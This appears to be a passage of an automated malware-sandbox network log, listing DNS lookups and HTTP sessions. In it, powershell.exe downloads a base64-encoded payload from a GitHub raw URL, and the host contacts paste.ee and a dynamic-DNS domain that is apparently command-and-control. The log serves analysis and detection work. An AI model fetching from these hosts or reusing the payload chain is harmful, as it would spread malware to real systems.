Oct 4, 2024 11:34:01.496521950 CEST | 192.168.2.5 | 1.1.1.1 | 0x3f81 | Standard query (0) | js.monitor.azure.com | 65 | IN (0x0001) | false
Oct 4, 2024 11:34:02.044235945 CEST | 192.168.2.5 | 1.1.1.1 | 0xc242 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:34:02.044677019 CEST | 192.168.2.5 | 1.1.1.1 | 0xc920 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Oct 4, 2024 11:34:07.155858994 CEST | 192.168.2.5 | 1.1.1.1 | 0xcc8e | Standard query (0) | js.monitor.azure.com | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:34:07.156267881 CEST | 192.168.2.5 | 1.1.1.1 | 0x448d | Standard query (0) | js.monitor.azure.com | 65 | IN (0x0001) | false
Oct 4, 2024 11:34:09.539875031 CEST | 192.168.2.5 | 1.1.1.1 | 0x61de | Standard query (0) | mdec.nelreports.net | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:34:09.540160894 CEST | 192.168.2.5 | 1.1.1.1 | 0xeb4b | Standard query (0) | mdec.nelreports.net | 65 | IN (0x0001) | false
Oct 4, 2024 11:35:00.543437004 CEST | 192.168.2.5 | 1.1.1.1 | 0xaf5 | Standard query (0) | ab9001.ddns.net | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:35:02.549645901 CEST | 192.168.2.5 | 1.1.1.1 | 0x3a6 | Standard query (0) | js.monitor.azure.com | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:35:02.549782991 CEST | 192.168.2.5 | 1.1.1.1 | 0x9686 | Standard query (0) | js.monitor.azure.com | 65 | IN (0x0001) | false
Oct 4, 2024 11:35:42.157587051 CEST | 192.168.2.5 | 1.1.1.1 | 0x7b15 | Standard query (0) | ab9001.ddns.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 4, 2024 11:33:48.210391998 CEST | 1.1.1.1 | 192.168.2.5 | 0x89c4 | No error (0) | raw.githubusercontent.com | - | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:33:48.210391998 CEST | 1.1.1.1 | 192.168.2.5 | 0x89c4 | No error (0) | raw.githubusercontent.com | - | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:33:48.210391998 CEST | 1.1.1.1 | 192.168.2.5 | 0x89c4 | No error (0) | raw.githubusercontent.com | - | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:33:48.210391998 CEST | 1.1.1.1 | 192.168.2.5 | 0x89c4 | No error (0) | raw.githubusercontent.com | - | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:33:51.296185970 CEST | 1.1.1.1 | 192.168.2.5 | 0xead8 | No error (0) | paste.ee | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:33:51.296185970 CEST | 1.1.1.1 | 192.168.2.5 | 0xead8 | No error (0) | paste.ee | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:33:52.977555990 CEST | 1.1.1.1 | 192.168.2.5 | 0xc470 | No error (0) | ab9001.ddns.net | - | 64.188.16.157 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:34:01.502896070 CEST | 1.1.1.1 | 192.168.2.5 | 0xa637 | No error (0) | consentdeliveryfd.azurefd.net | firstparty-azurefd-prod.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:34:01.502896070 CEST | 1.1.1.1 | 192.168.2.5 | 0xa637 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | azurefd-t-fb-prod.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:34:01.502896070 CEST | 1.1.1.1 | 192.168.2.5 | 0xa637 | No error (0) | dual.s-part-0017.t-0009.fb-t-msedge.net | s-part-0017.t-0009.fb-t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:34:01.502896070 CEST | 1.1.1.1 | 192.168.2.5 | 0xa637 | No error (0) | s-part-0017.t-0009.fb-t-msedge.net | - | 13.107.253.45 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:34:01.503843069 CEST | 1.1.1.1 | 192.168.2.5 | 0x80bb | No error (0) | consentdeliveryfd.azurefd.net | firstparty-azurefd-prod.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:34:01.504673958 CEST | 1.1.1.1 | 192.168.2.5 | 0x1e7d | No error (0) | js.monitor.azure.com | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:34:01.504673958 CEST | 1.1.1.1 | 192.168.2.5 | 0x1e7d | No error (0) | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | star-azurefd-prod.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:34:01.504673958 CEST | 1.1.1.1 | 192.168.2.5 | 0x1e7d | No error (0) | shed.dual-low.s-part-0016.t-0009.t-msedge.net | s-part-0016.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:34:01.504673958 CEST | 1.1.1.1 | 192.168.2.5 | 0x1e7d | No error (0) | s-part-0016.t-0009.t-msedge.net | - | 13.107.246.44 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:34:01.505079031 CEST | 1.1.1.1 | 192.168.2.5 | 0x3f81 | No error (0) | js.monitor.azure.com | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:34:01.505079031 CEST | 1.1.1.1 | 192.168.2.5 | 0x3f81 | No error (0) | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | star-azurefd-prod.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:34:03.039217949 CEST | 1.1.1.1 | 192.168.2.5 | 0xc920 | No error (0) | www.google.com | - | - | 65 | IN (0x0001) | false
Oct 4, 2024 11:34:03.039231062 CEST | 1.1.1.1 | 192.168.2.5 | 0xc242 | No error (0) | www.google.com | - | 142.250.184.196 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:34:07.050694942 CEST | 1.1.1.1 | 192.168.2.5 | 0x7f3a | No error (0) | consentdeliveryfd.azurefd.net | firstparty-azurefd-prod.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:34:07.050895929 CEST | 1.1.1.1 | 192.168.2.5 | 0xcf34 | No error (0) | consentdeliveryfd.azurefd.net | firstparty-azurefd-prod.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:34:07.050895929 CEST | 1.1.1.1 | 192.168.2.5 | 0xcf34 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:34:07.050895929 CEST | 1.1.1.1 | 192.168.2.5 | 0xcf34 | No error (0) | s-part-0017.t-0009.t-msedge.net | - | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:34:07.163018942 CEST | 1.1.1.1 | 192.168.2.5 | 0x448d | No error (0) | js.monitor.azure.com | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:34:07.163018942 CEST | 1.1.1.1 | 192.168.2.5 | 0x448d | No error (0) | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | star-azurefd-prod.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:34:07.163072109 CEST | 1.1.1.1 | 192.168.2.5 | 0xcc8e | No error (0) | js.monitor.azure.com | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:34:07.163072109 CEST | 1.1.1.1 | 192.168.2.5 | 0xcc8e | No error (0) | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | star-azurefd-prod.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:34:07.163072109 CEST | 1.1.1.1 | 192.168.2.5 | 0xcc8e | No error (0) | shed.dual-low.s-part-0032.t-0009.t-msedge.net | s-part-0032.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:34:07.163072109 CEST | 1.1.1.1 | 192.168.2.5 | 0xcc8e | No error (0) | s-part-0032.t-0009.t-msedge.net | - | 13.107.246.60 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:34:09.547645092 CEST | 1.1.1.1 | 192.168.2.5 | 0xeb4b | No error (0) | mdec.nelreports.net | mdec.nelreports.net.akamaized.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:34:09.548552990 CEST | 1.1.1.1 | 192.168.2.5 | 0x61de | No error (0) | mdec.nelreports.net | mdec.nelreports.net.akamaized.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:34:11.022789001 CEST | 1.1.1.1 | 192.168.2.5 | 0x7f0e | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:34:11.024483919 CEST | 1.1.1.1 | 192.168.2.5 | 0xb212 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:34:20.304296970 CEST | 1.1.1.1 | 192.168.2.5 | 0x2f32 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:34:20.314511061 CEST | 1.1.1.1 | 192.168.2.5 | 0x7a88 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:35:00.553200960 CEST | 1.1.1.1 | 192.168.2.5 | 0xaf5 | No error (0) | ab9001.ddns.net | - | 64.188.16.157 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:35:02.546556950 CEST | 1.1.1.1 | 192.168.2.5 | 0xde09 | No error (0) | consentdeliveryfd.azurefd.net | firstparty-azurefd-prod.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:35:02.546576023 CEST | 1.1.1.1 | 192.168.2.5 | 0x7ec8 | No error (0) | consentdeliveryfd.azurefd.net | firstparty-azurefd-prod.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:35:02.546576023 CEST | 1.1.1.1 | 192.168.2.5 | 0x7ec8 | No error (0) | shed.dual-low.s-part-0032.t-0009.t-msedge.net | s-part-0032.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:35:02.546576023 CEST | 1.1.1.1 | 192.168.2.5 | 0x7ec8 | No error (0) | s-part-0032.t-0009.t-msedge.net | - | 13.107.246.60 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:35:02.557156086 CEST | 1.1.1.1 | 192.168.2.5 | 0x3a6 | No error (0) | js.monitor.azure.com | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:35:02.557156086 CEST | 1.1.1.1 | 192.168.2.5 | 0x3a6 | No error (0) | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | star-azurefd-prod.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:35:02.557156086 CEST | 1.1.1.1 | 192.168.2.5 | 0x3a6 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:35:02.557156086 CEST | 1.1.1.1 | 192.168.2.5 | 0x3a6 | No error (0) | s-part-0017.t-0009.t-msedge.net | - | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:35:02.558228016 CEST | 1.1.1.1 | 192.168.2.5 | 0x9686 | No error (0) | js.monitor.azure.com | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:35:02.558228016 CEST | 1.1.1.1 | 192.168.2.5 | 0x9686 | No error (0) | aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net | star-azurefd-prod.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:35:15.186580896 CEST | 1.1.1.1 | 192.168.2.5 | 0xd7f5 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:35:15.187695026 CEST | 1.1.1.1 | 192.168.2.5 | 0xce10 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:35:20.840159893 CEST | 1.1.1.1 | 192.168.2.5 | 0x9b72 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:35:20.852581978 CEST | 1.1.1.1 | 192.168.2.5 | 0x6819 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 4, 2024 11:35:42.166039944 CEST | 1.1.1.1 | 192.168.2.5 | 0x7b15 | No error (0) | ab9001.ddns.net | - | 64.188.16.157 | A (IP address) | IN (0x0001) | false
                                                                                • raw.githubusercontent.com
                                                                                • otelrules.azureedge.net
                                                                                • slscr.update.microsoft.com
                                                                                • paste.ee
                                                                                • https:
                                                                                  • js.monitor.azure.com
                                                                                  • wcpstatic.microsoft.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 185.199.110.133 | 443 | 7136 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-04 09:33:48 UTC | 128 | OUT | GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive
2024-10-04 09:33:48 UTC | 902 | IN | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Content-Length: 2935468
                                                                                Cache-Control: max-age=300
                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                X-Content-Type-Options: nosniff
                                                                                X-Frame-Options: deny
                                                                                X-XSS-Protection: 1; mode=block
                                                                                X-GitHub-Request-Id: DDDE:3E1F9D:6A875A:733786:66FFB31C
                                                                                Accept-Ranges: bytes
                                                                                Date: Fri, 04 Oct 2024 09:33:48 GMT
                                                                                Via: 1.1 varnish
                                                                                X-Served-By: cache-ewr-kewr1740069-EWR
                                                                                X-Cache: HIT
                                                                                X-Cache-Hits: 0
                                                                                X-Timer: S1728034429.756231,VS0,VE58
                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                Access-Control-Allow-Origin: *
                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                X-Fastly-Request-ID: 34243b5ab7ab140ca9d94299e7b695c6ae0badb4
                                                                                Expires: Fri, 04 Oct 2024 09:38:48 GMT
                                                                                Source-Age: 0
                                                                                Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
                                                                                2024-10-04 09:33:48 UTC1378INData Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41
                                                                                Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
                                                                                2024-10-04 09:33:48 UTC1378INData Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41
                                                                                Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                1 | 192.168.2.5 | 49707 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:50 UTC | 195 | OUT | GET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:50 UTC | 540 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:50 GMT
                                                                                Content-Type: text/plain
                                                                                Content-Length: 218853
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public
                                                                                Last-Modified: Mon, 30 Sep 2024 13:16:38 GMT
                                                                                ETag: "0x8DCE1521DF74B57"
                                                                                x-ms-request-id: 90766f9b-701e-006f-578c-15afc4000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093350Z-15767c5fc554wklc0x4mc5pq0w0000000ct000000000097f
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                2 | 192.168.2.5 | 49706 | 4.175.87.197 | 443 | |
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:50 UTC | 306 | OUT | GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=dx+SZ2r9+LVmadL&MD=TD8vCUGP HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept: */*
                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                Host: slscr.update.microsoft.com
                                                                                2024-10-04 09:33:50 UTC | 560 | IN | HTTP/1.1 200 OK
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                Content-Type: application/octet-stream
                                                                                Expires: -1
                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                MS-CorrelationId: 3ed496d1-a03b-43e3-bf2d-a620b7ace979
                                                                                MS-RequestId: 18fee26c-ff60-46ba-835c-2292b1697cf1
                                                                                MS-CV: RtN6voQFrE2FGnia.0
                                                                                X-Microsoft-SLSClientCache: 2880
                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                X-Content-Type-Options: nosniff
                                                                                Date: Fri, 04 Oct 2024 09:33:49 GMT
                                                                                Connection: close
                                                                                Content-Length: 24490


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                3 | 192.168.2.5 | 49715 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:51 UTC | 192 | OUT | GET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:51 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:51 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 2980
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                ETag: "0x8DC582BA80D96A1"
                                                                                x-ms-request-id: b9d87bc3-001e-008d-128c-15d91e000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093351Z-15767c5fc55tsfp92w7yna557w0000000cc00000000049ut
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                4 | 192.168.2.5 | 49717 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:51 UTC | 192 | OUT | GET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:51 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:51 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 2160
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                ETag: "0x8DC582BA3B95D81"
                                                                                x-ms-request-id: 39d43082-801e-00ac-658c-15fd65000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093351Z-15767c5fc554w2fgapsyvy8ua00000000bug000000006dms
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:51 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                5 | 192.168.2.5 | 49713 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:51 UTC | 193 | OUT | GET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:51 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:51 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 3788
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                ETag: "0x8DC582BAC2126A6"
                                                                                x-ms-request-id: 1cc2ff82-e01e-0071-478c-1508e7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093351Z-15767c5fc55rg5b7sh1vuv8t7n0000000cng0000000072qu
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:51 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


